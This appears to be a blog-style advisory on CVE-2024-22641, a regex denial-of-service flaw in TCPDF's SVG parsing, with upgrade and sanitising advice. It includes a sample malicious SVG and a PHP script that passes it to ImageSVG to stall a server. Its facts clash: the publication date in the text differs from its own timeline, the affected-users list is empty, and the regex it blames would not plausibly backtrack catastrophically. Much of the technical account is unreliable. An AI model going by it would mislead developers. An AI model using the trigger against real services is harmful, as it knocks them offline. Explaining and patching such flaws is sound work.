CVE-2024-22641 - ReDoS Vulnerability in TCPDF When Parsing Untrusted SVG Files

On January 17, 2024, CVE-2024-22641 was published. This vulnerability affects TCPDF, a popular PHP library for generating PDF documents. Specifically, TCPDF versions 6.6.5 and earlier are vulnerable to a Regular Expression Denial of Service (ReDoS) attack when they process a specially crafted, malicious SVG file. In this post, we’ll break down what this means, show how it works, discuss its impact, and explain how to protect your applications.

What is TCPDF?

TCPDF (official website, GitHub) is an open-source PHP library that allows developers to generate PDF documents directly in web applications. It’s widely used in all sorts of PHP projects, from small websites to big enterprises.

A frequently-used feature of TCPDF is its ability to embed SVG (Scalable Vector Graphics) into PDFs, making it handy for dynamic reports, graphics, charts, and logos.

What is ReDoS?

Regular Expression Denial of Service (ReDoS) happens when a regular expression takes an extreme (and often unexpected) amount of time or resources to process large or specially crafted input. In web applications, where user input may be passed to regex functions, this can result in slowdowns or the server freezing, opening the door to easy denial-of-service attacks.

What is CVE-2024-22641?

CVE-2024-22641 is a vulnerability in TCPDF predecessor to version 6.6.6. If you feed it an SVG with malicious content, the library’s insecure regular expressions take a painfully long time to parse it—potentially freezing your server and causing DoS (Denial of Service).

Who’s Affected?

Anyone using TCPDF 6.6.5 or earlier, and allowing user-supplied SVGs to be included in generated PDFs. This impacts:

How the Vulnerability Works

At the core, the problem is that TCPDF’s SVG parser uses an inefficient regular expression to scan and extract information from SVG tags. Attackers can generate SVG files with specific patterns that trigger catastrophic backtracking in this regex, causing PHP to work for seconds, minutes, or even longer—effectively blocking your server while it processes the malicious file.

In /tcpdf_include.php and other internal files, TCPDF uses code like

preg_match_all('/<([a-zA-Z:]+)\s+([^>]*)>/s', $svg_content, $matches);

This regex is used to match each tag and its attributes. When it encounters a tag with a huge amount of whitespace or attributes, it can cause massive backtracking, especially if the input is intentionally designed to be ambiguous.

Exploit Details

Let’s see how an attacker might trick your server using a malicious SVG.

Sample Malicious SVG Trigger

The attacker crafts an SVG containing an opening tag with thousands of spaces and insignificant attribute characters:

<svg>
  <rect                                                                                                                a="x"                                                                                                               a="x"                                                                                                               a="x"                                                                                                              />
</svg>

With just a few lines like this—or, even worse, with purposeful patterns exploiting the regex—the parsing can take minutes or never complete.

Here’s example PHP code using vulnerable TCPDF to trigger high CPU usage

require_once('tcpdf.php');

// Craft the malicious SVG input
$malicious_svg = <<<SVG
<svg>
  <rect
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    a="x"
    // ... (many more repeated attributes)
  />
</svg>
SVG;

$pdf = new TCPDF();
$pdf->AddPage();
$pdf->ImageSVG('@' . $malicious_svg);

// This line may never be reached!
$pdf->Output('dangerous.pdf', 'I');

What Happens?

As soon as ImageSVG tries to parse the SVG, TCPDF’s regex engine is locked processing the huge tag. PHP’s CPU usage surges, your webserver stalls, and other requests start queuing up. If this is in a shared environment or a busy web service, all resources could be exhausted.

References and More Reading

- CVE-2024-22641 at NVD
- GitHub Issue Tracking the Problem
- Official Patch Notes

How to Fix

The only way to be safe is to upgrade TCPDF to the latest version (at least version 6.6.6), where the vulnerable regular expressions have been replaced or heavily optimized.

If you manage TCPDF with Composer

composer require tecnickcom/tcpdf

Otherwise, download the latest release and replace your TCPDF files.

Mitigation if Upgrade Isn’t Possible

If you can’t upgrade right away, NEVER accept untrusted SVG input. Consider stripping or sanitizing all <svg> content using a well-tested SVG sanitizer (e.g., SVG-Sanitizer). Do not process, store, or pass user-generated SVG directly to TCPDF.

Conclusion

CVE-2024-22641 is a serious but easy-to-mitigate vulnerability in TCPDF. If your application processes SVG files from untrusted sources, upgrade TCPDF now. Denial-of-service bugs like this can disrupt your services, frustrate users, and even ruin business reputations. Keep your dependencies updated, and remember: never trust unchecked user input—especially SVGs!

Questions? Share your experience or concerns in the comments!


*This post is original and exclusive. Please reference the original advisories and always keep your software up to date.*

Timeline

Published on: 05/28/2024 21:16:29 UTC
Last modified on: 08/01/2024 22:51:10 UTC